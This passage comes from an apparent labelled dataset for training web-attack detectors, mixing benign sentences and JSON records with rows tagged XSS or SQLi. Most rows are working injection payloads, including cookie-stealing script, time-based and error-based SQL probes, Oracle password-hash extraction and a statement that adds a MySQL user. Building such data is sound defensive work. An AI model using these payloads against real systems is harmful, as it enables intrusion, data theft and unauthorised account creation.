),2,SQLi,10790 "<blockquote onpaste=""alert(1)"" contenteditable>test</blockquote>",1,XSS,2958 "<meta onmousedown=""alert(1)"">test</meta>",1,XSS,7872 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,11958 "1 ) as yduh where 6481 = 6481 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12130 ><script>alert(0)</script>,1,XSS,9673 "<link oncopy=""alert(1)"" contenteditable>test</link>",1,XSS,5411 "<embed onmousedown=""alert(1)"">test</embed>",1,XSS,7523 "-9392 ) ) or elt ( 1032 = 1032,3623 ) and ( ( 2975 = 2975",2,SQLi,17511 "<form draggable=""true"" ondragend=""alert(1)"">test</form>",1,XSS,4441 "1'|| ( select 'kgjk' where 3530 = 3530 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12222 Filter the noisy data.,3,normal,22571 "<tbody onpaste=""alert(1)"" contenteditable>test</tbody>",1,XSS,4692 "<style>@keyframes x{}</style><canvas style=""animation-name:x"" onanimationend=""alert(1)""></canvas>",1,XSS,1560 "1' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )",2,SQLi,10916 "<a href=""javas\x00cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2490 Those that opened after 2010 may select half their intake on religious grounds if they are oversubscribed; those that opened earlier can select more.,3,normal,25296 -5962 ) ) as jbqv where 2583 = 2583 or 7496 = 8560--,2,SQLi,18171 "<template onpaste=""alert(1)"" contenteditable>test</template>",1,XSS,3525 "<wbr draggable=""true"" ondragenter=""alert(1)"">test</wbr>",1,XSS,4544 "-4860' ) as azyx where 6901 = 6901 union all select 6901,6901,6901,6901,6901#",2,SQLi,15395 "<section draggable=""true"" ondragend=""alert(1)"">test</section>",1,XSS,3402 1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'ujds' = 'ujds,2,SQLi,17297 "In Settings, scroll to find and select Display & Brightness.",3,normal,26005 <meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus>,1,XSS,2274 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""yxes"" like ""yxes",2,SQLi,14453 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></meta>",1,XSS,235 ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,18991 "-5027%"" ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""%"" = """,2,SQLi,12847 (alert)(1),1,XSS,9846 1'|| ( select 'tzxr' from dual where 2934 = 2934 and 4595 = 4595#,2,SQLi,16700 Select your consider.,3,normal,24979 Where's the best place to go for a hike?,3,normal,23736 "1', ( select ( case when ( 3902 = 3902 ) then ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) else 1/ ( select 0 from dual ) end ) from dual )",2,SQLi,11416 "1"" ) as xsgx where 5239 = 5239 union all select null,null--",2,SQLi,17285 1' ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'opyp' = 'opyp,2,SQLi,9988 -1802' or 7931 = 5841--,2,SQLi,21295 <svg><script ?>alert(1),1,XSS,9730 "For those using iPhones, open the App Store, select updates, select WhatsApp and then hit Update.",3,normal,26172 select ( case when ( 7385 = 8723 ) then 7385 else 7385* ( select 7385 from information_schema.character_sets ) end ) #,2,SQLi,13255 "-3205"" ) union all select 5233,5233,5233,5233#",2,SQLi,18960 select ( case when ( 1123 = 9550 ) then 1123 else 1123* ( select 1123 from information_schema.character_sets ) end ) #,2,SQLi,13225 Join the team.,3,normal,22840 Filter the list.,3,normal,22887 "1%"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""%"" = """,2,SQLi,10566 "When you select print, the default printer is set to "" A4 mono in this room "" .",3,normal,25147 1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'vnfi' = 'vnfi,2,SQLi,10444 -4896' ) union all select 1929--,2,SQLi,20332 "1"" where 7696 = 7696 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,10026 /><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />,1,XSS,4649 "1, ( select ( case when ( 7616 = 7616 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,15596 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#",2,SQLi,14563 -6566' ) as kggb where 9768 = 9768 order by 1--,2,SQLi,18871 "-1148"" ) ) union all select 5442,5442,5442,5442#",2,SQLi,18742 "1' in boolean mode ) union all select null,null,null,null,null--",2,SQLi,16764 "The Financial Select Sector SPDR Fund fell 3 percent year-to-date through Friday compared with the Energy Select Sector SPDR Fund up 8 percent and up 1 percent, respectively.",3,normal,25450 "1' in boolean mode ) union all select null,null,null,null,null,null,null--",2,SQLi,15762 "1%"" ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,17245 "<input onclick=""alert(1)"">test</input>",1,XSS,8461 These private accounts often have a considerably smaller and select following.,3,normal,25326 "<style>@keyframes x{}</style><wbr style=""animation-name:x"" onanimationend=""alert(1)""></wbr>",1,XSS,1728 He is stopping in for a coffee at Café Select.,3,normal,26121 Insert your contact information in the form.,3,normal,22926 "-4085'+ ( select aipn where 5493 = 5493 union all select 5493,5493,5493,5493,5493,5493,5493#",2,SQLi,14578 "-1707 ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 7756 = 7756",2,SQLi,10308 Update your profile details.,3,normal,22695 "<del draggable=""true"" ondragstart=""alert(1)"">test</del>",1,XSS,4609 ) or pg_sleep ( __TIME__ ) --,2,SQLi,20682 "Another select committee, this time of the House of Lords, returned to the subject in 1835, and after a long investigation re-enunciated the theory that all prisoners should be kept separate from one another.",3,normal,26364 "1%' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( '%' = '",2,SQLi,15777 1 ) and 2006 = 2006,2,SQLi,21983 "1"" ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ""nobt"" = ""nobt",2,SQLi,11139 "<style>:target {color: red;}</style><div id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></div>",1,XSS,1069 <nextid onpointerover=alert(1)>XSS</nextid>,1,XSS,7283 "1, ( select 6825 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6825 = 6825,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11282 "1' ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'xtdj' = 'xtdj",2,SQLi,10964 group by userid having 1 = 1--,2,SQLi,20521 Where did you discover that inspiring story from?,3,normal,23758 """,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,16030 "<picture onmouseenter=""alert(1)"">test</picture>",1,XSS,6168 "<applet oncontextmenu=""alert(1)"">test</applet>",1,XSS,6463 "<style>:target {color: red;}</style><tbody id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></tbody>",1,XSS,891 "<div draggable=""true"" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table>",1,XSS,968 "1' in boolean mode ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) #",2,SQLi,10505 "1"" ) ) and 7656 = 5604 and ( ( ""zuhv"" = ""zuhv",2,SQLi,19055 <optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus>,1,XSS,1965 &#x00003c,1,XSS,9853 "1 ) ) as vycb where 3524 = 3524 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12086 select ( case when ( 4780 = 4432 ) then 4780 else 4780* ( select 4780 from mysql.db ) end ) #,2,SQLi,14520 "<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script",1,XSS,1911 "1' ) as ekjw where 5477 = 5477 union all select null,null,null,null,null--",2,SQLi,15714 "<label onclick=""alert(1)"">test</label>",1,XSS,8356 "{""id"":null,""firstName"":""Gunaraj"",""lastName"":""Sundrajekar"",""address"":""747 Leonis Blvd"",""city"":""780"",""telephone"":""3335771302""}",3,normal,27026 end,3,normal,23152 -1700%' or 4149 = 3391#,2,SQLi,21297 "{""id"":null,""name"":""buy""}",3,normal,27020 "<multicol draggable=""true"" ondragleave=""alert(1)"">test</multicol>",1,XSS,2837 "1' ) where 3703 = 3703 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11479 "<button onmouseout=""alert(1)"">test</button>",1,XSS,7216 %BCscript%BEalert(%A2XSS%A2)%BC/script%BE,1,XSS,7608 "<div draggable=""true"" contenteditable>drag me</div><content ondrop=alert(1) contenteditable>drop here</content>",1,XSS,977 <samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus>,1,XSS,2270 "<param draggable=""true"" ondragstart=""alert(1)"">test</param>",1,XSS,3772 1' in boolean mode ) rlike sleep ( 5 ) #,2,SQLi,19488 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*",2,SQLi,15008 "<div id=""div1""><input value=""``onmouseover=javascript:alert(1)""></div> <div id=""div2""></div><script>document.getElementById(""div2"").innerHTML = document.getElementById(""div1"").innerHTML;</script>",1,XSS,134 "-8790' ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'nsze' like 'nsze",2,SQLi,10155 -7901 ) order by 1--,2,SQLi,21850 "<style>:target {transform: rotate(180deg);}</style><output id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></output>",1,XSS,583 "I look forward to the definitive report Chairman Gowdy and the select Committee will present to the American people.” Gowdy's select committee held just one public hearing in the six months since the House voted to form the panel in May, and Boehner has long said that he expected the committee's work to last beyond the 113th Congress, which ends in January.",3,normal,26074 <SCRIPT SRC=//.rocks/.j>,1,XSS,9719 <em onpointermove=alert(1)>XSS</em>,1,XSS,9038 "1' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,16016 "<style>@keyframes slidein {}</style><form style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></form>",1,XSS,395 1' ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 'nfix' = 'nfix,2,SQLi,10242 "Guys are starting to seriously realize that League of Legends is a TEAM GAME and it starts in Champions selection, even in SoloQueue... Talking about the pending picks and team comps is not toxic, not inappropriate and not stupid, and you can't say ""let him play what he wants or dodge"" because that's stupid.",3,normal,26501 Select bar.,3,normal,24544 "<dd oncontextmenu=""alert(1)"">test</dd>",1,XSS,8404 1'|| ( select 'wadx' where 4287 = 4287 or sleep ( 5 ) #,2,SQLi,17749 "<cite onmouseout=""alert(1)"">test</cite>",1,XSS,8186 "{""id"":null,""name"":""check ship go""}",3,normal,27239 "1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11450 <marquee id=x tabindex=1 onactivate=alert(1)></marquee>,1,XSS,4615 "-1084' ) union all select 2634,2634,2634,2634,2634,2634,2634,2634#",2,SQLi,16631 "1"" where 7796 = 7796",2,SQLi,21782 "<div ondblclick=""alert(1)"">test</div>",1,XSS,8596 "1' ) where 8835 = 8835 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14192 Select a fabric for the chair that picks up either a darker shade of the wall color of the accent color in the room.,3,normal,25665 1' ) ) and 7533 = 7533 and ( ( 'pagc' like 'pagc,2,SQLi,18750 "{""id"":null,""firstName"":""Quan"",""lastName"":""Yuan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26853 "1' ) ) as rxhe where 3838 = 3838 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12214 end and ( ( 'vcaf' like 'vcaf,2,SQLi,20725 "<summary onbeforepaste=""alert(1)"" contenteditable>test</summary>",1,XSS,2910 "iif ( 4460 = 1610,1,1/0 )",2,SQLi,21117 <button onDragLeave=javascript:alert(1)>,1,XSS,8074 1' or '1'='1,2,SQLi,22284 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--",2,SQLi,15914 "benchmark(50000000,MD5(1))",2,SQLi,20948 <dialog id=x tabindex=1 onfocusin=alert(1)></dialog>,1,XSS,5266 "<dd oncopy=""alert(1)"" contenteditable>test</dd>",1,XSS,6165 "Sexual misconduct is, of course, not limited to select private schools.",3,normal,25563 <video id=x tabindex=1 onactivate=alert(1)></video>,1,XSS,5483 "Bagley, a forward for the Sacramento Kings, was promoted from the Select Team to the Senior roster on Friday after a scrimmage won by the Select Team.",3,normal,26340 "{""id"":null,""firstName"":""Angie"",""lastName"":""Ang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26769 "<header onmousedown=""alert(1)"">test</header>",1,XSS,6898 "While many continental municipalities were becoming more democratic in the 14th century, those of England were drifting towards oligarchy, towards government by a close ""select body.""",3,normal,25135 "-9884' ) or elt ( 1942 = 8409,8409 ) and ( 'tqdq' like 'tqdq",2,SQLi,17217 "1"" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""aixs"" = ""aixs",2,SQLi,14341 "1%' and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13624 <marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus>,1,XSS,2652 "1%"" ) ) ) and sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,19212 "{""id"":null,""firstName"":""Sabrina"",""lastName"":""Qiu"",""address"":""92 Main St"",""city"":""199"",""telephone"":""2549804677""}",3,normal,27496 <br onpointerleave=alert(1)>XSS</br>,1,XSS,8792 1 ) as bpap where 7758 = 7758 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,15369 "<progress onkeydown=""alert(1)"" contenteditable>test</progress>",1,XSS,3192 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*",2,SQLi,9898 "1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( 'zjnp' = 'zjnp",2,SQLi,12373 <center id=x tabindex=1 onbeforeactivate=alert(1)></center>,1,XSS,3652 "-7941%' ) union all select 6965,6965,6965,6965--",2,SQLi,18743 1' in boolean mode ) and 7533 = 7533#,2,SQLi,19917 Up to 50% off select Lifesmart Hot Tubs and Massage Chairs,3,normal,25207 "<sub oncut=""alert(1)"" contenteditable>test</sub>",1,XSS,5978 <element id=x tabindex=1 onbeforeactivate=alert(1)></element>,1,XSS,3372 "{""id"":7493,""name"":""for jmeter test to work <DO NOT DELETE""}",3,normal,26805 "-5757%"" ) or 6872 = 6872 and ( ""%"" = """,2,SQLi,19776 <input type=text value=“XSS”>,1,XSS,9607 -9950' or 4425 = 1975,2,SQLi,21598 "<audio autoplay onplaying=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1766 An act of 1887 had amended the provisions of the Wallace Act in regard to second class cities by changing the terms of select councilmen from two to four years and of common councilmen from one to two years.,3,normal,26378 "1"" ) ) as wfne where 8933 = 8933",2,SQLi,20356 Join the hiking adventure.,3,normal,22646 "1 and make_set ( 9681 = 4703,4703 ) # zbrf",2,SQLi,19292 "1 ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15653 <form onpointerleave=alert(1)>XSS</form>,1,XSS,7906 "1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) -- sbvl",2,SQLi,13358 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15",2,SQLi,18144 "1"" rlike ( select ( case when ( 2724 = 4757 ) then 1 else 0x28 end ) ) and ""cmsa"" = ""cmsa",2,SQLi,14716 -4644 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # upwd,2,SQLi,13475 "insert into mysql.user ( user, host, password ) values ( 'name', 'localhost', password ( 'pass123' ) )",2,SQLi,14017 "1"" ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ""hrkf"" like ""hrkf",2,SQLi,11563 "1' where 3700 = 3700 union all select null,null,null--",2,SQLi,17976 "1' ) as yjdg where 5262 = 5262 union all select null,null,null#",2,SQLi,16870 1'|| ( select 'exls' where 3837 = 3837 and sleep ( 5 ) ) ||',2,SQLi,17151 "<img onmouseover=""alert(1)"">test</img>",1,XSS,8417 ") or (1""=""1""/*",2,SQLi,22189 <img onpointerout=alert(1)>XSS</img>,1,XSS,8820 �><s�%2b�cript>alert(document.cookie)</script>,1,XSS,6286 "1%"" ) or sleep ( 5 ) and ( ""%"" = """,2,SQLi,20165 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,12968 <button onReverse=javascript:alert(1)>,1,XSS,8539 "1' ) where 8252 = 8252 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15675 "-7119"" ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ""rmzm"" = ""rmzm",2,SQLi,12750 Index columns where applicable.,3,normal,23291 Where's the field defined?,3,normal,23383 -5751 ) as jybu where 4739 = 4739 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10495 Select the right colors for the painting.,3,normal,24237 "<head onbeforecut=""alert(1)"" contenteditable>test</head>",1,XSS,4328 "If you need to delete files, tap on Select, select the files you wish to delete, then tap ""Delete"" in the lower right corner.3.",3,normal,26050 <wbr onpointerdown=alert(1)>XSS</wbr>,1,XSS,8590 or 1=1/*,2,SQLi,22474 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,13330 "1"" where 9669 = 9669",2,SQLi,21880 <footer id=x tabindex=1 onbeforeactivate=alert(1)></footer>,1,XSS,3643 select ( case when ( 1726 = 4080 ) then 1726 else 1/ ( select 0 ) end ) --,2,SQLi,15823 "<td onmouseout=""alert(1)"">test</td>",1,XSS,9037 Save up to 49% off select Sabrent USB hubs & docking stations,3,normal,25714 "RC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""",1,XSS,23 "<tbody onbeforecopy=""alert(1)"" contenteditable>test</tbody>",1,XSS,3720 "1%"" ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13415 "<command onbeforepaste=""alert(1)"" contenteditable>test</command>",1,XSS,2904 or 1 = 1 /*,2,SQLi,22401 <blink id=x tabindex=1 onfocusin=alert(1)></blink>,1,XSS,5536 "1 ) ) as rual where 4649 = 4649 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11066 "1'|| ( select 'gopc' where 7386 = 7386 and make_set ( 9375 = 7963,7963 ) ) ||'",2,SQLi,15375 "<style>:target {color: red;}</style><marquee id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></marquee>",1,XSS,781 "-7409"" ) ) union all select 3145,3145,3145--",2,SQLi,19096 1' where 8729 = 8729,2,SQLi,21839 Fetch records where valid.,3,normal,23275 1' ) ) as qswu where 6377 = 6377,2,SQLi,20310 "<META HTTP-EQUIV=""Link"" Content=""<%(css)s>; REL=stylesheet"">",1,XSS,3433 "]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1",2,SQLi,17231 1'|| ( select 'hbho' from dual where 7193 = 7193,2,SQLi,18694 "<fieldset oncopy=""alert(1)"" contenteditable>test</fieldset>",1,XSS,3624 "<keygen onkeyup=""alert(1)"" contenteditable>test</keygen>",1,XSS,4261 <content id=x tabindex=1 onfocusin=alert(1)></content>,1,XSS,4727 "<style>@keyframes x{}</style><hgroup style=""animation-name:x"" onanimationstart=""alert(1)""></hgroup>",1,XSS,1471 "1 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13346 -8641%' order by 1--,2,SQLi,21788 AND 1=0#,2,SQLi,22502 <svg><dialog onload=alert(1)></dialog>,1,XSS,8427 "<style>@keyframes slidein {}</style><hgroup style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></hgroup>",1,XSS,370 "Williams Sonoma Home: 20% off select living room furniture and pillows and bedroom furniture; and up to 30% off select outdoor dining and lounge furniture, rugs and more using code OUTDOOR.",3,normal,25121 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i",2,SQLi,11809 "1 ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13136 "\"";document.vulnerable=true;;//",1,XSS,9494 "{""id"":null,""name"":""ourselves giving think sky""}",3,normal,27508 "1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11408 Where's the data source?,3,normal,23472 "-8661"" union all select 5731,5731--",2,SQLi,20116 1 ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,18129 1,3,normal,26648 "<abbr draggable=""true"" ondragenter=""alert(1)"">test</abbr>",1,XSS,4062 -3297' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,10707 "<embed width=500 height=500 code=""data:text/html,<script>%(payload)s</script>""></embed>",1,XSS,1826 "{""id"":null,""firstName"":""Tao"",""lastName"":""Ming"",""address"":""105 Amity Way, Wayne PA 19087"",""city"":""642"",""telephone"":""3320145468""}",3,normal,26906 "1 ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 5137 = 5137",2,SQLi,10996 Select the best theme.,3,normal,24371 "<title draggable=""true"" ondragleave=""alert(1)"">test</title>",1,XSS,3760 <main onblur=alert(1) tabindex=1 id=x></main><input autofocus>,1,XSS,3234 "-2434 ) union all select 8310,8310,8310,8310,8310--",2,SQLi,18326 <discard onpointerup=alert(1)>XSS</discard>,1,XSS,7249 "-9904"" ) ) union all select 9080,9080,9080,9080,9080--",2,SQLi,17977 "<style>@keyframes x{}</style><i style=""animation-name:x"" onanimationend=""alert(1)""></i>",1,XSS,1833 <button onURLFlip=javascript:alert(1)>,1,XSS,8542 "<div draggable=""true"" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span>",1,XSS,1244 1' ) where 4509 = 4509 union all select null--,2,SQLi,18957 1 ) as iknl where 3885 = 3885 rlike sleep ( 5 ) #,2,SQLi,18604 "&#00;</form><input type&#61;""date"" onfocus=""alert(1)"">",1,XSS,4658 1 and 4595 = 4595#,2,SQLi,22063 <set onpointerup=alert(1)>XSS</set>,1,XSS,9001 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""lzyl"" like ""lzyl",2,SQLi,11938 She's researching where to buy the best produce.,3,normal,23846 <var onpointerenter=alert(1)>XSS</var>,1,XSS,8346 Select your analyze.,3,normal,24997 "<html onclick=""alert(1)"">test</html>",1,XSS,8896 <center onpointerout=alert(1)>XSS</center>,1,XSS,7493 She will select soon.,3,normal,24459 "-7238%' or make_set ( 5375 = 9563,9563 ) and '%' = '",2,SQLi,18185 "1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) # mafe",2,SQLi,11883 "They act in a similar way to Parliamentary select committees, scrutinizing the work of the Cabinet and reviewing Council policies and services.",3,normal,25323 "1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( 'subq' like 